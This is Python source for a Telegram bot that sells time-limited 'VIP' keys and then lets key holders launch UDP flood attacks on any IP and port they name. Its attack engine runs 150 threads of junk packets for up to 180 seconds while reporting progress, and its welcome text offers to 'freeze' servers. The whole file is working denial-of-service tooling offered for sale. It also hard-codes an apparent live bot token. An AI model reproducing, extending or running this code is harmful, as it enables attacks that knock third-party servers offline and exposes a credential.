import telebot
import socket
import threading
import time
import uuid
from datetime import datetime, timedelta

# --- CONFIG ---
TOKEN = '8662314100:AAFtujdEZNZvv5aSLyfIznvyQe1Klnl7DVk'
ADMIN_ID = 6075779781 
CONTACT_LINK = "@FLEXOP01" 
bot = telebot.TeleBot(TOKEN)

# --- DATABASE ---
keys = {} 
users = {} 

# --- PROGRESS BAR LOGIC ---
def get_progress_bar(percent):
    done = int(percent / 10)
    return "█" * done + "░" * (10 - done)

# --- ATTACK ENGINE ---
def attack_engine(ip, port, duration, chat_id, message_id):
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    bytes_data = b"\x00" * 1200
    start_time = time.time()
    end_time = start_time + duration
    
    def flood():
        while time.time() < end_time:
            try: client.sendto(bytes_data, (ip, port))
            except: break
        client.close()

    for _ in range(150): # Power badha di hai
        threading.Thread(target=flood, daemon=True).start()

    while time.time() < end_time:
        elapsed = time.time() - start_time
        percent = min(100, int((elapsed / duration) * 100))
        remaining = int(end_time - time.time())
        bar = get_progress_bar(percent)
        
        try:
            bot.edit_message_text(
                chat_id=chat_id, 
                message_id=message_id,
                text=(
                    f"🚀 **ATTACK IN PROGRESS!**\n\n"
                    f"🎯 **Target:** `{ip}:{port}`\n"
                    f"⏳ **Remaining:** `{remaining}s`\n"
                    f"📊 **Progress:** `[{bar}] {percent}%`"
                ), parse_mode="Markdown"
            )
        except: pass
        time.sleep(3) # Update speed sahi rakhi hai

    try:
        bot.edit_message_text(
            chat_id=chat_id, 
            message_id=message_id, 
            text=f"✅ **ATTACK COMPLETE!**\n\n🎯 **Target:** `{ip}:{port}`\n🔥 **Status:** Finished\n\nSupport: {CONTACT_LINK}"
        )
    except: pass

# --- COMMANDS ---

@bot.message_handler(commands=['genkey'])
def generate_key(m):
    if m.from_user.id != ADMIN_ID:
        bot.reply_to(m, f"❌ **Chori mat kar!**\nOwner: {CONTACT_LINK}")
        return
    args = m.text.split()
    if len(args) == 2:
        days = int(args[1])
        key = f"VIP-{str(uuid.uuid4())[:8].upper()}"
        keys[key] = datetime.now() + timedelta(days=days)
        
        # Direct Copy format
        msg = (
            f"🔑 **NEW VIP KEY**\n\n"
            f"Click to Copy:\n`/redeem {key}`\n\n"
            f"📅 **Validity:** {days} Days\n"
            f"👤 **Generated by:** Admin"
        )
        bot.send_message(m.chat.id, msg, parse_mode="Markdown")
    else:
        bot.reply_to(m, "Usage: `/genkey 1` (1 din ke liye)")

@bot.message_handler(commands=['redeem'])
def redeem_key(m):
    args = m.text.split()
    if len(args) == 2:
        user_key = args[1]
        if user_key in keys:
            expiry = keys.pop(user_key)
            users[m.from_user.id] = expiry
            
            guide = (
                f"✅ **VIP ACCESS ACTIVATED!**\n"
                f"📅 **Expires on:** {expiry.strftime('%Y-%m-%d %H:%M')}\n\n"
                f"📖 **HOW TO USE:**\n"
                f"Copy and Edit this command:\n"
                f"`/attack 1.1.1.1 8080 60` \n\n"
                f"*(IP, Port aur Time dalo aur bhej do)*\n"
                f"🆘 **Support:** {CONTACT_LINK}"
            )
            bot.reply_to(m, guide, parse_mode="Markdown")
        else:
            bot.reply_to(m, "❌ **Invalid Key!**\nSahi key mang: " + CONTACT_LINK)
    else:
        bot.reply_to(m, "Usage: `/redeem VIP-XXXX`")

@bot.message_handler(commands=['attack'])
def handle_attack(m):
    if m.from_user.id not in users and m.from_user.id != ADMIN_ID:
        bot.reply_to(m, "🚫 **Access Denied!**\nKey kharido: " + CONTACT_LINK)
        return
    
    # Expiry Check
    if m.from_user.id in users and datetime.now() > users[m.from_user.id]:
        bot.reply_to(m, "⌛ **Key Expired!**\nNayi key lo: " + CONTACT_LINK)
        return

    try:
        args = m.text.split()
        if len(args) == 4:
            ip, port, dur = args[1], int(args[2]), int(args[3])
            if dur > 180: # Safety Limit
                bot.reply_to(m, "❌ **Max Time 180s!**")
                return
            
            sent = bot.reply_to(m, "📡 **Connecting to Server...**")
            threading.Thread(target=attack_engine, args=(ip, port, dur, m.chat.id, sent.message_id)).start()
        else:
            bot.reply_to(m, "💡 **Example:** `/attack 1.1.1.1 8080 60`", parse_mode="Markdown")
    except: pass

@bot.message_handler(commands=['start'])
def start(m):
    bot.reply_to(m, f"👋 **Welcome {m.from_user.first_name}!**\n\nKyo bhai, server freeze karna hai? 😏\n\nKey hai toh `/redeem` karo.\nNahi hai toh {CONTACT_LINK} par message karo.")

if __name__ == "__main__":
    bot.infinity_polling()
  
